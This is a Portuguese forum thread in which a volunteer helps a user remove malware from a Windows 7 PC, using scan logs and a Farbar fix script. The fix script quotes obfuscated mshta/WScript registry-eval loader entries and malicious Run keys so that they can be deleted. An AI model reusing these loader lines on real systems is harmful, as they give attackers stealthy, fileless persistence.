Ir ao conteúdo
  • Cadastre-se
henriquemoe

Ajuda para remover o syswow64 cmd.exe virus por favor

Recommended Posts

Olá senhores mestres da enigmática área de segurança.

Não sei dizer exatamente como ele entrou no meu sistema, mas agora sempre que ligo o PC aparece a caixa de diálogo para executar o cmd.exe na pasta syswow64 e depois meu navegador abre sozinho. Eu li as regras para criar o tópico, mas por alguma razão que desconheço não estou conseguindo anexar o arquivo do log. Vou em Escolha os arquivos... e quando clico duas vezes em ZA-Scan.txt aparece um aviso em cima de Anexar arquivos dizendo Upload cancelado (Nenhum arquivo selecionado). Por isso estou copiando o log aqui no tópico.

 

 
ZA-Scan V1.0.0.4 Updated 04-May-2015
Tool run by moe on Wed 08/12/2015 at 13:56:41.93.
Microsoft Windows 7 Ultimate  6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\moe\Desktop\ZA-Scan.exe [Z-Analyse Scan]
 
==== Running Processes ======================
 
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Windows\SysWOW64\regsvr32.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ESET-phase2.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
C:\Users\moe\Desktop\ZA-Scan.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\moe\AppData\Local\Temp\ZAScan.exe
 
==== Services(whitelist) ======================
Powered by E Dev
 
R2 - [AntiVirSchedulerService] - Avira Scheduler - c:\program files (x86)\avira\antivir desktop\sched.exe
R2 - [AntiVirService] - Avira Real-Time Protection - c:\program files (x86)\avira\antivir desktop\avguard.exe
R2 - [GfExperienceService] - NVIDIA GeForce Experience Service - c:\program files\nvidia corporation\geforce experience service\gfexperienceservice.exe
R2 - [intel® PROSet Monitoring Service] - Intel® PROSet Monitoring Service - c:\windows\system32\iprosetmonitor.exe
R2 - [NvNetworkService] - NVIDIA Network Service - c:\program files (x86)\nvidia corporation\netservice\nvnetworkservice.exe
R2 - [NvStreamSvc] - NVIDIA Streamer Service - c:\program files\nvidia corporation\nvstreamsrv\nvstreamservice.exe
R2 - [nvsvc] - NVIDIA Display Driver Service - c:\windows\system32\nvvsvc.exe
R2 - [stereo Service] - NVIDIA Stereoscopic 3D Driver Service - c:\program files (x86)\nvidia corporation\3d vision\nvscpapisvr.exe
R2 - [wlidsvc] - Windows Live ID Sign-in Assistant - c:\program files\common files\microsoft shared\windows live\wlidsvc.exe
R3 - [steam Client Service] - Steam Client Service - c:\program files (x86)\common files\steam\steamservice.exe
R3 - [WSearch] - Windows Search - c:\windows\system32\searchindexer.exe
S2 - [AntiVirMailService] - Avira Mail Protection - c:\program files (x86)\avira\antivir desktop\avmailc7.exe
S2 - [AntiVirWebService] - Avira Web Protection - c:\program files (x86)\avira\antivir desktop\avwebg7.exe
S2 - [clr_optimization_v4.0.30319_32] - Microsoft .NET Framework NGEN v4.0.30319_X86 - c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe
S2 - [clr_optimization_v4.0.30319_64] - Microsoft .NET Framework NGEN v4.0.30319_X64 - c:\windows\microsoft.net\framework64\v4.0.30319\mscorsvw.exe
S2 - [gupdate] - Google Update Service (gupdate) - c:\program files (x86)\google\update\googleupdate.exe
S2 - [skypeUpdate] - Skype Updater - c:\program files (x86)\skype\updater\updater.exe
S2 - [sppsvc] - Software Protection - c:\windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe
S3 - [ALG] - Application Layer Gateway Service - c:\windows\system32\alg.exe
S3 - [aspnet_state] - ASP.NET State Service - c:\windows\microsoft.net\framework64\v4.0.30319\aspnet_state.exe
S3 - [COMSysApp] - COM+ System Application - c:\windows\system32\dllhost.exe
S3 - [ehRecvr] - Windows Media Center Receiver Service - c:\windows\ehome\ehrecvr.exe
S3 - [ehSched] - Windows Media Center Scheduler Service - c:\windows\ehome\ehsched.exe
S3 - [Fax] - Fax - c:\windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - c:\windows\microsoft.net\framework64\v3.0\wpf\presentationfontcache.exe
S3 - [gupdatem] - Google Update Service (gupdatem) - c:\program files (x86)\google\update\googleupdate.exe
S3 - [iDriverT] - InstallDriver Table Manager - c:\program files (x86)\common files\installshield\driver\1150\intel 32\idrivert.exe
S3 - [Microsoft SharePoint Workspace Audit Service] - Microsoft SharePoint Workspace Audit Service - d:\programas\office14\groove.exe
S3 - [MSDTC] - Distributed Transaction Coordinator - c:\windows\system32\msdtc.exe
S3 - [msiserver] - Windows Installer - c:\windows\system32\msiexec.exe
S3 - [ose] - Office  Source Engine - c:\program files (x86)\common files\microsoft shared\source engine\ose.exe
S3 - [osppsvc] - Office Software Protection Platform - c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe
S3 - [PerfHost] - Performance Counter DLL Host - c:\windows\syswow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - c:\windows\system32\locator.exe
S3 - [sNMPTRAP] - SNMP Trap - c:\windows\system32\snmptrap.exe
S3 - [TrustedInstaller] - Windows Modules Installer - c:\windows\servicing\trustedinstaller.exe
S3 - [vds] - Virtual Disk - c:\windows\system32\vds.exe
S3 - [VSS] - Volume Shadow Copy - c:\windows\system32\vssvc.exe
S3 - [wbengine] - Block Level Backup Engine Service - c:\windows\system32\wbengine.exe
S3 - [wmiApSrv] - WMI Performance Adapter - c:\windows\system32\wbem\wmiapsrv.exe
S3 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - c:\program files\windows media player\wmpnetwk.exe
S4 - [clr_optimization_v2.0.50727_32] - Microsoft .NET Framework NGEN v2.0.50727_X86 - c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe
S4 - [clr_optimization_v2.0.50727_64] - Microsoft .NET Framework NGEN v2.0.50727_X64 - c:\windows\microsoft.net\framework64\v2.0.50727\mscorsvw.exe
 
==== Drivers(whitelist) ======================
Powered by E Dev
 
R0 - [FileInfo] - File Information FS MiniFilter - C:\Windows\system32\Drivers\FileInfo.sys
R0 - [FltMgr] - FltMgr - C:\Windows\system32\Drivers\FltMgr.sys
R0 - [Mup] - Mup - C:\Windows\system32\Drivers\Mup.sys
R1 - [NetBIOS] - NetBIOS Interface - C:\Windows\system32\Drivers\NetBIOS.sys
R3 - [srv] - Server SMB 1.xxx Driver - C:\Windows\system32\Drivers\srv.sys
R3 - [srv2] - Server SMB 2.xxx Driver - C:\Windows\system32\Drivers\srv2.sys
R0 - [ACPI] - Microsoft ACPI Driver - C:\Windows\system32\Drivers\ACPI.sys
R0 - [amdxata] - amdxata - C:\Windows\system32\Drivers\amdxata.sys
R0 - [atapi] - IDE Channel - C:\Windows\system32\Drivers\atapi.sys
R0 - [CLFS] - Common Log (CLFS) - C:\Windows\system32\Drivers\CLFS.sys [x]
R0 - [CNG] - CNG - C:\Windows\system32\Drivers\CNG.sys
R0 - [Disk] - Disk Driver - C:\Windows\system32\Drivers\Disk.sys
R0 - [fvevol] - Bitlocker Drive Encryption Filter Driver - C:\Windows\system32\Drivers\fvevol.sys
R0 - [hwpolicy] - Hardware Policy Driver - C:\Windows\system32\Drivers\hwpolicy.sys
R0 - [KSecDD] - KSecDD - C:\Windows\system32\Drivers\KSecDD.sys
R0 - [KSecPkg] - KSecPkg - C:\Windows\system32\Drivers\KSecPkg.sys
R0 - [mountmgr] - Mount Point Manager - C:\Windows\system32\Drivers\mountmgr.sys
R0 - [msahci] - msahci - C:\Windows\system32\Drivers\msahci.sys
R0 - [msisadrv] - msisadrv - C:\Windows\system32\Drivers\msisadrv.sys
R0 - [NDIS] - NDIS System Driver - C:\Windows\system32\Drivers\NDIS.sys
R0 - [partmgr] - Partition Manager - C:\Windows\system32\Drivers\partmgr.sys
R0 - [pci] - PCI Bus Driver - C:\Windows\system32\Drivers\pci.sys
R0 - [pcw] - Performance Counters for Windows Driver - C:\Windows\system32\Drivers\pcw.sys
R0 - [rdyboost] - ReadyBoost - C:\Windows\system32\Drivers\rdyboost.sys
R0 - [spldr] - Security Processor Loader Driver - C:\Windows\system32\Drivers\spldr.sys
R0 - [storflt] - Disk Virtual Machine Bus Acceleration Filter Driver - C:\Windows\system32\Drivers\storflt.sys [x]
R0 - [Tcpip] - TCP/IP Protocol Driver - C:\Windows\system32\Drivers\Tcpip.sys
R0 - [vdrvroot] - Microsoft Virtual Drive Enumerator Driver - C:\Windows\system32\Drivers\vdrvroot.sys
R0 - [volmgr] - Volume Manager Driver - C:\Windows\system32\Drivers\volmgr.sys
R0 - [volmgrx] - Dynamic Volume Manager - C:\Windows\system32\Drivers\volmgrx.sys
R0 - [volsnap] - Storage volumes - C:\Windows\system32\Drivers\volsnap.sys
R0 - [Wdf01000] - Kernel Mode Driver Frameworks service - C:\Windows\system32\Drivers\Wdf01000.sys
R0 - [WfpLwf] - WFP Lightweight Filter - C:\Windows\system32\Drivers\WfpLwf.sys
R1 - [AFD] - Ancillary Function Driver for Winsock - C:\Windows\system32\Drivers\AFD.sys
R1 - [beep] - Beep - C:\Windows\system32\Drivers\Beep.sys
R1 - [tdx] - NetIO Legacy TDI Support Driver - C:\Windows\system32\Drivers\tdx.sys
R2 - [tcpipreg] - TCP/IP Registry Compatibility - C:\Windows\system32\Drivers\tcpipreg.sys
 
==== Startup Registry Enabled ======================
 
[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"
 
[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"
 
[HKEY_USERS\S-1-5-21-295846624-1181092002-1136915101-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"Steam"="C:\Program Files (x86)\Steam\steam.exe -silent"
"ISsoft"="C:\Windows\SysWOW64\regsvr32.exe C:\Users\moe\AppData\Local\IWPsoft\mjmhevql.dll"
 
[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"
 
[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NUSB3MON"="C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
"Adobe Reader Speed Launcher"="C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"BCSSync"="D:\Programas\Office14\BCSSync.exe /DelayServices"
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Steam"="C:\Program Files (x86)\Steam\steam.exe -silent"
"ISsoft"="C:\Windows\SysWOW64\regsvr32.exe C:\Users\moe\AppData\Local\IWPsoft\mjmhevql.dll"
 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"389634223"="C:\ProgramData\mscijc.exe"
 
==== Startup Registry Enabled x64 ======================
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvBackend"="C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
"ShadowPlay"="C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart"
"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"
 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"389634223"="C:\ProgramData\mscijc.exe"
 
==== Startup Folders ======================
 
2010-01-22 19:56:09 1033938 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ESET-phase2.exe
2015-06-19 23:03:44 2174 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GIGABYTE OC_GURU.lnk
 
==== Task Scheduler Jobs ======================
 
C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [08/01/2015 02:02 AM]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [06/19/2015 08:02 PM]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [06/19/2015 08:02 PM]
 
==== Other Scheduled Tasks ======================
 
"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask" [%systemroot%\system32\sc.exe start osppsvc]
 
==== Chromium Look ======================
 
AdBlock - moe\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom
Chrome Hotword Shared Module - moe\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg
Chrome Web Store Payments - moe\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
 
==== Chromium Startpages ======================
 
C:\Users\moe\AppData\Local\Google\Chrome\User Data\Default\Preferences
CA47EF2C4D","mgndgikekgjfcpckkfioiadnlibdjbkf":"3A70CF7C99A131BAA63FB890451435BCB77E374F14ADDBC13DA51A44B14B9054","mhjfbmdgcfjbbpaeojofohoefgiehjai":"B95A835A4039141EE3F6FB595584743862B0F63E11354442D28AFA2FF7A7D884","nbpagnldghgfoolbancepceaanlmhfmd":"A37C19498B80ED096D75500FC833F65E831A7E697E7A76C7E86D58F5B4E9B4DE","neajdppkdcdipfabeoofebfddakdcjhd":"D82F1E17AC4B734E750C8F3C51C7DD695076AA83AC89914D433EED87E764FFD0","nkeimhogjdpnpccoofpliimaahmaaome":"C7EF40EBB37807CC2DBB5ACDE8F2A2DFBE834A609EBD69581A23FAF233BC3354","nmmhkkegccagdldgiimedpiccmgmieda":"55DF9530E5F51A409A613D02C18F7D604F6BB0BD39E236C1AC4F53AFC5420EFE","pafkbggdmjlpgkdkcbjmhmfcdpncadgh":"93C6B7CAF05A98672693949E7D3BC1B3D25B8F4DECB5EE54B94B75110CB2CD2B"}},"google":{"services":{"account_id":"D2D60DAA0790E10DE2922D6859EEDA553A1B72C15CCE518E4D9A790C202EAC38","last_username":"B0D03756D4D949AE4542FF8382BBBEA957846041912F3B1C8A6386320922505D","username":"8C4E66D02657FC3EE48A794564A08D3FA2B6D0EF37E87B93FACABE39C7F13AE7"}},"homepage":"75B9307AD34B76E667FD61620DA71A091F0344C2DA1A3C912288CC9E4A1F969B","homepage_is_newtabpage":"C97BC59321597303745116237C8CB32F62682EFACB4C9053FB7192E4AA39F4AB","pinned_tabs":"1D614248B621C833DE1A5518BB81529B70107755621B3F21258E3CBFAA624B2C","prefs":{"preference_reset_time":"E1C63A71CAC8FA03A3F859B51AC520713F6ACBE8BDD88034A932F4C5B716EB32"},"profile":{"reset_prompt_memento":"EDAF8F9307B33235D3E08EBE9A05B0D20C525278DB7E519306F579142D4B26B9"},"safebrowsing":{"incidents_sent":"C8A51AE351C6AC21D4EF32C9E6A4944B7A1C5ACBD51C7B6220DEAB4D67BED8C4"},"search_provider_overrides":"466F41DB5B89C8BF70303AE80B78834D2F29E82C1613167B3C4963E52019B3B9","session":{"restore_on_startup":"6306E2765051737FAB7B4EE7305D27FE795EB87706585A33D1D68205C7FF2B6A","startup_urls":"B43A41C17BADBB9746945909E7DAFCB673C48E9147C240CCBE639C4457152C29"},"software_reporter":{"prompt_reason":"10409B2BE6CB2E7BE15DA380A78CE73C604DE290EB6514DED9D0115130A63971","prompt_seed":"B70B0E543AEC5F98EF5747E4FA7BBC0169B9A32299BD1C26A6B26C85DCD4480E","prompt_version":"33F508E4D11165039BA5BDE56C9014CFE657FEDACFD410F197E03C88B9B796B8"},"sync":{"remaining_rollback_tries":"2A993D7ECD1B50ECF57BED92590B26895B81CC6B2B809E96A1B0F16993E4FB9E"}},"super_mac":"6C685A9F929FD30E62512F86496114E8548C057C8A88F3A71D16A7ACF62C35BA"},"session":{"restore_on_startup":1,"startup_urls":["http://www.google.com/]}}
 
 
==== IE Start and Search Settings ======================
 
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found
 
==== HijackThis Entries ======================
 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - D:\PROGRA~1\Office14\GROOVEEX.DLL
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - D:\PROGRA~1\Office14\URLREDIR.DLL
O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
 
==== EOF on Wed 08/12/2015 at 13:57:33.38 ======================
 

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro henriquemoe

 

Recomendo que salve este tópico em seus Favoritos para facilitar na hora de encontrá-lo.

Por favor, atente para o seguinte:

  • Caso fique sem resposta durante 3 dias, me envie uma Mensagem Privada (MP);
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Sempre coloque suas respostas neste tópico... Não abra outro!
  • Procure sempre me manter informado, durante a remoção, sobre o que acontece com seu computador.
  • Respeite a ordem das instruções passadas.
  • Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!
# Etapa nº 1 #

Faça o download Junkware Removal Tool e salve em seu Desktop.
  • Desative seus programas de proteção (antivírus etc) para evitar qualquer conflito.
  • Clique duas vezes JRT.exe
    • Se seu sistema for Windows Vista ou Windows 7 ou Windows 8, clique com o botão direito do mouse e peça para Executar como Administrador.

    [*]Seja paciente e aguarde o scan terminar.[*]Abra o log JRT.txt que está em seu Desktop.[*]Copie todo conteúdo e cole em sua próximo mensagem.



# Etapa nº 2 #

  • Clique duas vezes no adwcleaner.exe
    • Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png

  • Clique em Pesquisar
  • No final do scan será aberto um log com o resultado.
  • Caso algo seja detectado, clique então no botão Remover.
  • Novamente, no final do scan será aberto um log com o resultado.
  • Copie todo seu conteúdo e cole em sua próxima resposta.



# Etapa nº 3 #

Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

Baixe o Farbar Recovery Scan Tool e salve na sua área de trabalho.
32 bit (x86)ou 64 bit (x64)

Dê um duplo-clique para executar a ferramenta. Aceite o contrato e depois clique no botão Scan.

Aguarde e ao final, os logs FRST.txt e Addition.txt serão salvos no seu desktop.

Anexe os logs na sua próxima resposta.

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro henriquemoe

 

A coisa está feia aí... por favor, siga fielmente os procedimentos abaixo, qualquer dúvida me pergunte primeiro. ;)

 

# Etapa nº 1 #

 

Abra o Bloco de Notas e crie um arquivo chamado Fixlist.txt
Salve em sua Área de Trabalho (Desktop);
Copie todo o conteúdo abaixo e cole no aquivo criado acima:

CreateRestorePoint:CloseProcesses:HKLM-x32\...\Run: [**7321548f<*>] => mshta javascript:eNfl1POr="RPmC70oKZa";kT46=new%20ActiveXObject("WScript.Shell");CGUtml0UP="WlbjaXIzvV";KnrZ1=kT46.RegRead("HKLM\\software\\Wow6432Node\\f0ff38737c\\76e53d0a");BMj8ig9w="5";eval(KnrZ1) (the data entry has 23 more characters). <===== ATTENTION (Value Name with invalid characters)HKLM\...\Policies\Explorer\Run: [389634223] => C:\ProgramData\mscijc.exe [128000 2010-11-21] ()C:\ProgramData\mscijc.exeHKLM\...\Policies\Explorer\Run: [541122217] => C:\ProgramData\msrzdmwzl.exe [94720 2010-11-21] ()C:\ProgramData\msrzdmwzl.exeHKLM\...\Policies\Explorer: [NoInternetOpenWith] 1HKLM\...\Policies\Explorer: [MemCheckboxinRunDlg] 1HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1HKLM\...\Policies\Explorer: [HideSCAHealth] 1HKU\S-1-5-21-295846624-1181092002-1136915101-1000\...\Run: [**7321548f<*>] => mshta javascript:EFO07kfQO="Jb";k9M=new%20ActiveXObject("WScript.Shell");IjqCrc8O="lC";kTOa2=k9M.RegRead("HKCU\\software\\f0ff38737c\\76e53d0a");J1JLcqXfU="QJ";eval(kTOa2);VFUh8lFX="Hg8x"; <===== ATTENTION (Value Name with invalid characters)HKU\S-1-5-21-295846624-1181092002-1136915101-1000\...\Run: [Zzvamdvrt] => rundll32 "C:\Users\moe\AppData\Roaming\eventvwrd.dll",kkqeqHKU\S-1-5-21-295846624-1181092002-1136915101-1000\...\Run: [**e873050f<*>] => mshta javascript:hKv0ue5t="4Zd2iji9";gu6=new%20ActiveXObject("WScript.Shell");sN0ZucMQG="M";ji6qV5=gu6.RegRead("HKCU\\software\\69714991f1\\6a914b42");nc4AqiktR="rpaMYSjSp";eval(ji6qV5);b7MBvSiC="4wgw (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)HKU\S-1-5-21-295846624-1181092002-1136915101-1000\...\Run: [**397c4c97<*>] => mshta javascript:BTLt7rMf="Nw15f";Oi64=new%20ActiveXObject("WScript.Shell");bS4Rdgvd="b";y4a4Xk=Oi64.RegRead("HKCU\\software\\69714991f1\\6a914b42");r9s7xUSQjd="X2H9c";eval(y4a4Xk);v0TdG9xaP="kDAEGtKk (the data entry has 2 more characters). <===== ATTENTION (Value Name with invalid characters)SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =S3 VGPU; System32\drivers\rdvgkmd.sys [X]2015-08-07 18:55 - 2015-08-07 18:55 - 0151552 __RSH () C:\Users\moe\AppData\Roaming\eventvwrd.dll2008-02-05 15:28 - 2008-02-05 15:28 - 0000336 _____ () C:\Users\moe\AppData\Local\setup.txt2010-11-21 00:24 - 2010-11-21 00:24 - 0128000 ___SH () C:\ProgramData\mscijc.exe2010-11-21 00:24 - 2010-11-21 00:24 - 0094720 ___SH () C:\ProgramData\msrzdmwzl.exeVerifySignature: C:\Windows\explorer.exeCMD:ipconfig /flushdnsEmptyTemp:
Execute novamente o Farbar Recovery Scan Tool e clique no botão Fix;
Aguarde e poste o log em sua próxima resposta.

 

# Etapa nº 2 #

 

Execute novamente o Farbar Recovery Scan Tool;
No espaço em Search digite:

*explorer.exe
 
FRST%20Console%20with%2090days.jpg
 
  • Clique no botão Search Files;
  • Aguarde o log;
  • Anexe-o em sua próxima resposta.

 

# Etapa nº 3 #

 

Ative o Firewall.

 

# Etapa nº 4 #

 

Atualize seu Antivírus e mantenha-o ativado, salvo exceção quando for pedido.

 

# Etapa nº 5 #

 

Name: Network Controller
The drivers for this device are not installed.

 

Você precisa instalar um driver para a placa de rede cabeada, faça isso quando terminarmos seu caso. ;)

 

# Etapa nº 6 #

 

Está instalado, numa outra partição, o Windows XP. Caso não faça uso dele, remova-o daí.

 

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Feito, nessa última vez que reiniciei o pc não apareceu mais a caixa de diálogo pra executar o cmd.exe. Eu tenho o xp instalado num outro HD porque recentemente comprei um novo HD onde instalei o windows 7, mas mantive o antigo pra não perder os arquivos que eu tinha. Como faço para desinstalar o xp sem perder os arquivos?

Eu uso o Avira, mas recentemente quando tento ativar o firewall dele aparece uma janela de ajuda e ele não é ativado.

Por último, vou viajar esse final de semana e só posso executar os próximos procedimentos segunda, por isso peço para não deletar meu post achando que eu o abandonei.

 

abraços

Search.txt

Fixlog.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites
Como faço para desinstalar o xp sem perder os arquivos?

 

Basta salvar os arquivos no Windows 7 e depois remover o XP. ;)

 

Por último, vou viajar esse final de semana e só posso executar os próximos procedimentos segunda, por isso peço para não deletar meu post achando que eu o abandonei.

 

Ok... fico no aguardo.

Compartilhar este post


Link para o post
Compartilhar em outros sites





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×